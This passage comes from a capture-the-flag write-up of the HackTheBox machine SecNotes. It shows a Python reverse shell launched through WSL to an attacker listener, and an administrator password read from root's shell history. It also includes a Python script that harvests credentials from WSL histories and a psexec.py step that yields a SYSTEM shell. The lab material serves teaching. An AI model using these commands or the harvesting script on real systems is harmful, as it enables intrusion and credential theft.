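NT AUTHORITY\SYSTEM Allow  FullControl
BUILTIN\Users Allow  ReadAndExecute, Synchronize
NT AUTHORITY\Authenticated Users Allow  Modify, Synchronize
"""


def decode_mask(value):
    """Translate a (possibly negative) Int32 access mask into generic-right names."""
    mask = int(value) & 0xFFFFFFFF          # recover the unsigned 32-bit view
    names = [name for bit, name in GENERIC_RIGHTS.items() if mask & bit]
    return names or ["0x%08X" % mask]       # fall back to hex for unknown bits


def parse_access_to_string(text):
    """Parse '<identity> <Allow|Deny>  <rights>' lines as printed by Select -Expand AccessToString."""
    entries = []
    for line in text.splitlines():
        m = re.match(r"^(.*?)\s+(Allow|Deny)\s+(.+)$", line.strip())
        if not m:
            continue
        identity, ace_type, rights = m.groups()
        if re.fullmatch(r"-?\d+", rights):
            names = decode_mask(rights)
        else:
            names = [r.strip() for r in rights.split(",")]
        entries.append({"identity": identity, "type": ace_type, "rights": names})
    return entries


def writable_by_low_priv(text):
    """Identities of low-privileged principals that are allowed a write-like right."""
    return sorted({
        e["identity"] for e in parse_access_to_string(text)
        if e["type"] == "Allow" and e["identity"] in LOW_PRIV and WRITE_LIKE & set(e["rights"])
    })


if __name__ == "__main__":
    for label, acl in (("C:\\Windows", WINDOWS_ACL), ("ubuntu.exe", UBUNTU_EXE_ACL)):
        for e in parse_access_to_string(acl):
            print(label, e["identity"], e["type"], ", ".join(e["rights"]))
        print(label, "writable by low-privileged principals:", writable_by_low_priv(acl))
```

Decoding shows that the -1610612736 on BUILTIN\Users for C:\Windows is only GENERIC_READ plus GENERIC_EXECUTE, so nothing there is flagged, while ubuntu.exe is flagged because Authenticated Users holds Modify. From a hardening point of view that is the ACE to remove: an executable that any authenticated user can overwrite is a persistence and privilege-escalation risk whenever a more privileged account runs it.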

Windows subsystem for Linux

At this point I checked HackTricks to see if there was anything on this, and there was a section on Linux on Windows. We can confirm both executables exist and any user can run them.

PS C:\Distros\Ubuntu> dir C:\Windows\system32\wsl.exe


    Directory: C:\Windows\system32


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        6/21/2018   3:02 PM         114688 wsl.exe                                                               


PS C:\Distros\Ubuntu> dir C:\Windows\system32\bash.exe


    Directory: C:\Windows\system32


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        6/21/2018   3:02 PM         115712 bash.exe

PS C:\Distros\Ubuntu> Get-Acl C:\Windows\system32\wsl.exe | Select -Expand AccessToString
NT AUTHORITY\SYSTEM Allow  ReadAndExecute, Synchronize
BUILTIN\Administrators Allow  ReadAndExecute, Synchronize
BUILTIN\Users Allow  ReadAndExecute, Synchronize
NT SERVICE\TrustedInstaller Allow  FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize

Let’s run it and see which Linux user we are inside the subsystem

PS C:\Distros\Ubuntu> C:\Windows\system32\wsl.exe whoami
root

Great, we are root, but only inside the distro. wsl.exe starts the instance under the Windows token of whoever launched it, so from the Windows side every process in it is still tyler, and /mnt/c gives us nothing tyler couldn’t already read (the failed mount attempts in the history below ran into exactly that). HackTricks suggests spawning a Python reverse shell from WSL; I found this reference and this screenshot useful in getting one, with the listener on 10.10.14.78:443

PS C:\Distros\Ubuntu> C:\Windows\system32\wsl.exe python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.78',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn('/bin/bash')"

root@Kali:~/HTB/SecNotes# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.78] from (UNKNOWN) [10.10.10.97] 49745
root@SECNOTES:~# ^Z
[1]+  Stopped                 nc -nlvp 443
root@Kali:~/HTB/SecNotes# stty raw -echo
root@Kali:~/HTB/SecNotes# nc -nlvp 443
                                      ls
filesystem
root@SECNOTES:~# stty rows 40 columns 150
root@SECNOTES:~# export SHELL=bash
root@SECNOTES:~# export TERM=xterm
root@SECNOTES:~# export LS_OPTIONS='--color=auto'
root@SECNOTES:~# eval "`dircolors`"
root@SECNOTES:~# alias ls='ls $LS_OPTIONS'
root@SECNOTES:~# export PS1='\[\e]0;\u@\h: \w\a\]\[\033[01;32m\]\u@\h\[\033[01;34m\] \w \$\[\033[00m\] '
root@SECNOTES ~ #

Interestingly, the shell could even be upgraded to a fully interactive one with colours. Looking in root’s home directory inside WSL we see

root@SECNOTES ~ # ls -lah
total 8.0K
drwx------ 1 root root  512 Jun 22  2018 .
drwxr-xr-x 1 root root  512 Jun 21  2018 ..
---------- 1 root root  492 Oct 12 10:08 .bash_history
-rw-r--r-- 1 root root 3.1K Jun 22  2018 .bashrc
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
drwxrwxrwx 1 root root  512 Jun 22  2018 filesystem
root@SECNOTES ~ # ls -lah filesystem/
total 0
drwxrwxrwx 1 root root 512 Jun 22  2018 .
drwx------ 1 root root 512 Jun 22  2018 ..

and .bash_history, although its mode is 000, is readable by root and contains credentials

root@SECNOTES ~ # cat .bash_history 
cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
> .bash_history 
less .bash_history
exitid
ls -lah
pwd
cd \
cd /
ls -lah
cd /home
ls -lah
cd /root
ls -lah
cd filesystem
ls -lah
exit

To make sure we aren’t missing another account, check which WSL users have a login shell; only root does

root@SECNOTES ~ # getent passwd | grep bash
root:x:0:0:root:/root:/bin/bash

If we hadn’t found anything here, we’d enumerate the Linux subsystem as we would any Linux box. One thing IppSec points out is to check the mounts with df -h in case something interesting, such as the Administrator’s profile, has been mounted inside WSL; it isn’t on this box, but it’s good to know. Alternatively, we don’t need a WSL reverse shell at all: a WSL1 distro’s rootfs lives as ordinary NTFS files under the owning user’s profile, and Windows enforces only the NTFS ACL, not the Linux mode bits, so tyler can read root’s .bash_history straight from PowerShell

PS C:\Users\tyler\Appdata\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root> type .bash_history
cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
> .bash_history 
less .bash_history
exitid
ls -lah
pwd
cd \
cd /
ls -lah
cd /home
ls -lah
cd /root
ls -lah
cd filesystem
ls -lah
exit
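The two ways of reading root’s history above (from inside WSL, and with type from PowerShell) generalise to a small audit script. This is an added example of mine, not code from the write-up or from HackTricks: it finds every WSL1 rootfs under a Users directory, lists which Linux accounts have a login shell, and greps root’s history for embedded passwords in the smbclient user%pass, impacket user:pass@host and mount -o user=..,password=.. forms. The profile layout and the credential patterns are assumptions on my part, and the sample tree it builds is constructed (only the smbclient line is the box’s own).

```python
# Added example, mine rather than code from the write-up or HackTricks. It
# generalises the "type .bash_history from PowerShell" step: find every WSL1
# distro rootfs under a Users directory, list the Linux accounts with a real
# login shell (what `getent passwd | grep bash` showed) and pull credentials
# out of root's shell history. Assumed: the WSL1 layout
# <Users>/<user>/AppData/Local/Packages/<pkg>/LocalState/rootfs and the three
# credential syntaxes matched below; the sample tree in run_demo() is constructed.
import re
import tempfile
from pathlib import Path
from typing import Dict, List

HISTORY_FILES = ("root/.bash_history", "root/.zsh_history")
PASSWD_FILE = "etc/passwd"

# smbclient/rpcclient style:  -U 'user%pass'  (quotes optional)
_PERCENT = re.compile(r"""-U\s*=?\s*(['"]?)([^'"\s%]+)%([^'"\s]+)\1""")
# impacket style:  'user':'pass'@host  or  user:pass@host
_IMPACKET = re.compile(r"""(['"]?)([^'"\s:@]+)\1:(['"]?)([^'"\s@]+)\3@""")
# key=value options (mount -o, cifs credentials files, mysql):  user=..,password=..
_KV_PASS = re.compile(r"(?:^|[\s,])(?:password|passwd|pass|pw)=([^\s,]+)")
_KV_USER = re.compile(r"(?:^|[\s,])(?:username|user)=([^\s,]+)")


def creds_from_history(text: str) -> List[dict]:
    """One record per history line that embeds a password; lines naming only a user are skipped."""
    found: List[dict] = []
    for no, line in enumerate(text.splitlines(), 1):
        m = _PERCENT.search(line)
        if m:
            found.append({"line": no, "kind": "user%pass", "user": m.group(2), "password": m.group(3)})
            continue
        m = _IMPACKET.search(line)
        if m:
            found.append({"line": no, "kind": "user:pass@", "user": m.group(2), "password": m.group(4)})
            continue
        m = _KV_PASS.search(line)
        if m:
            u = _KV_USER.search(line)
            found.append({"line": no, "kind": "key=value", "user": u.group(1) if u else None, "password": m.group(1)})
    return found


def login_shell_users(passwd_text: str) -> List[str]:
    """Accounts whose shell is not a nologin/false stub."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        shell = fields[6].rsplit("/", 1)[-1]
        if shell and shell not in ("nologin", "false", "sync", "halt", "shutdown"):
            users.append(fields[0])
    return users


def audit_wsl(users_dir: Path) -> Dict[str, dict]:
    """Map each WSL1 rootfs under users_dir to its login-shell users and any history credentials."""
    report: Dict[str, dict] = {}
    # Windows applies only the NTFS ACL here, so the 000 Linux mode on .bash_history is irrelevant.
    for rootfs in sorted(users_dir.glob("*/AppData/Local/Packages/*/LocalState/rootfs")):
        if not rootfs.is_dir():
            continue
        entry = {"shell_users": [], "creds": []}
        passwd = rootfs / PASSWD_FILE
        if passwd.is_file():
            entry["shell_users"] = login_shell_users(passwd.read_text(errors="replace"))
        for rel in HISTORY_FILES:
            hist = rootfs / rel
            if hist.is_file():
                for c in creds_from_history(hist.read_text(errors="replace")):
                    entry["creds"].append({"file": rel, **c})
        report[str(rootfs)] = entry
    return report


# Constructed sample data: only the smbclient line is from the box; the svc_backup
# mount line and the 'backup' account are made up to exercise the other code paths.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
backup:x:1000:1000::/home/backup:/bin/zsh
"""
SAMPLE_HISTORY = r"""cd /mnt/c/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\127.0.0.1\c$
mount -t cifs //fileserver/backup /mnt/bk -o user=svc_backup,password=Winter2018!
exit
"""


def run_demo() -> Dict[str, dict]:
    """Build the sample profile tree in a temp dir, audit it and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        pkg = "CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc"
        rootfs = Path(tmp, "Users", "tyler", "AppData", "Local", "Packages", pkg, "LocalState", "rootfs")
        (rootfs / "etc").mkdir(parents=True)
        (rootfs / "root").mkdir()
        (rootfs / PASSWD_FILE).write_text(SAMPLE_PASSWD)
        (rootfs / HISTORY_FILES[0]).write_text(SAMPLE_HISTORY)
        return audit_wsl(Path(tmp, "Users"))
```

On a target you would call audit_wsl(Path(r"C:\Users")) from a Python you control; by default you can only traverse your own profile, which on SecNotes is exactly where tyler’s distro lives. The mount line that names a user but no password is deliberately not reported, since that command prompted for one interactively; run_demo() exercises the same code against the constructed tree.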

Priv esc to SYSTEM

Now that we have the credentials, let’s check what we can access with smbmap

root@Kali:~/HTB/SecNotes# smbmap -u 'Administrator' -p 'u6!4ZwgwOM#^OBf#Nwnh' -H secnotes.htb
[+] Finding open SMB ports....
[+] User SMB session establishd on secnotes.htb...
[+] IP: secnotes.htb:445	Name: secnotes.htb                                      
	Disk                                                  	Permissions
	----                                                  	-----------
	ADMIN$                                            	READ, WRITE
	C$                                                	READ, WRITE
	IPC$                                              	READ ONLY
	new-site                                          	NO ACCESS

We have write access to ADMIN$ and C$. A local Administrator with a writable ADMIN$ is all psexec.py needs: it uploads a service binary to ADMIN$, opens the Service Control Manager through the SVCCTL pipe over SMB, creates and starts a service that points at that binary, and because services run as LocalSystem the resulting shell is SYSTEM. It is noisy, though: the dropped executable and the service creation are both logged on the host.

root@Kali:~/HTB/SecNotes# psexec.py 'Administrator':'u6!4ZwgwOM#^OBf#Nwnh'@secnotes.htb
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on secnotes.htb.....
[*] Found writable share ADMIN$
[*] Uploading file LlYReNNI.exe
[*] Opening SVCManager on secnotes.htb.....
[*] Creating service YlCi on secnotes.htb.....
[*] Starting service YlCi.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\system